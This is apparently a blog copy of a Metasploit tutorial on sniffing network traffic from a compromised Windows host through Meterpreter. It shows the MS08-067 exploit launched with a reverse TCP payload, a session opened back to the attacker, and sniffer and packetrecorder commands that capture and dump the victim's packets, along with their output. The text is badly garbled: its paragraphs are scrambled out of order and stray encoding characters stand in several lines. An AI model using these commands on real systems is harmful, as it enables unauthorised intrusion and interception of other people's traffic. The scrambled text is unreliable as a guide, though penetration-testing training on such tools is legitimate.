We will take a quick look to see if we captured anything interesting. There is now a capture file waiting for us that can be analyzed in a tool such as Wireshark or tshark. Packets being saved in to /root/logs/packetrecorder/XEN-XP-SP2-BARE_20101119.5105/XEN-XP-SP2-BARE_ meterpreter > run packetrecorder -i 2 -l /root/ We will begin sniffing traffic on the second interface, saving the logs to the desktop of our Kali system and let the sniffer run for awhile. meterpreter > run packetrecorder -liġ - 'Realtek RTL8139 Family PCI Fast Ethernet NIC' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )Ģ - 'Citrix XenServer PV Ethernet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )ģ - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false ) t Time interval in seconds between recollection of packet, default 30 seconds.īefore we start sniffing traffic, we first need to determine which interfaces are available to us. li List interfaces that can be used for capture. l Specify and alternate folder to save PCAP file. i Interface ID number where all packet capture will be done. Meterpreter Script for capturing packets in to a PCAP file To see what options are available, we issue the run packetrecorder command without any arguments. packetrecorderĪs an alternative to using the sniffer extension, Carlos Perez wrote the packetrecorder Meterpreter script that allows for some more granularity when capturing packets. In addition, Meterpreter pipes all information through an SSL/TLS tunnel and is fully encrypted. The module is smart enough to realize its own traffic as well and will automatically remove any traffic from the Meterpreter interaction. The Meterpreter packet sniffer uses the MicroOLAP Packet Sniffer SDK and can sniff the packets from the victim machine without ever having to install any drivers or write to the file system. We can now use our favorite parser or packet analysis tool to review the information intercepted. Flushed 279 packets (57849 bytes) from interface 2 Download or release them using 'sniffer_dump' or 'sniffer_release' There are 279 packets (57849 bytes) remaining Flushing packet capture buffer for interface 2. Wrote 19 packets to PCAP file /tmp/all.cap Meterpreter > sniffer_dump 2 /tmp/all.cap Capture started on interface 2 (50000 packet buffer) Sniffer_stop Stop packet captures on the specified interfaceġ - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )Ģ - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )ģ - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false ) Sniffer_stats View statistics of an active capture Sniffer_start Capture packets on a previously opened interface Sniffer_interfaces List all remote sniffable interfaces Sniffer_dump Retrieve captured packet data We then dump the sniffer output to /tmp/all.cap. Meterpreter session 1 opened (10.10.1.4:4444 -> 10.10.1.119:1921)įrom here we initiate the sniffer on interface 2 and start collecting packets. Transmitting intermediate stager for over-sized stage.(216 bytes) Msf exploit( ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp msf > use exploit/windows/smb/ms08_067_netapi We first fire off our remote exploit toward the victim and gain our standard reverse Meterpreter console. The sniffer module can store up to 200,000 packets in a ring buffer and exports them in standard PCAP format so you can process them using psnuffle, dsniff, wireshark, etc. This is especially useful if we want to monitor what type of information is being sent, and even better, this is probably the start of multiple auxiliary modules that will ultimately look for sensitive data within the capture files. Meterpreter has the capability of packet sniffing the remote host without ever touching the hard disk. Security Operations for Beginners (SOC-100).Exploit Development Prerequisites (EXP-100).
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |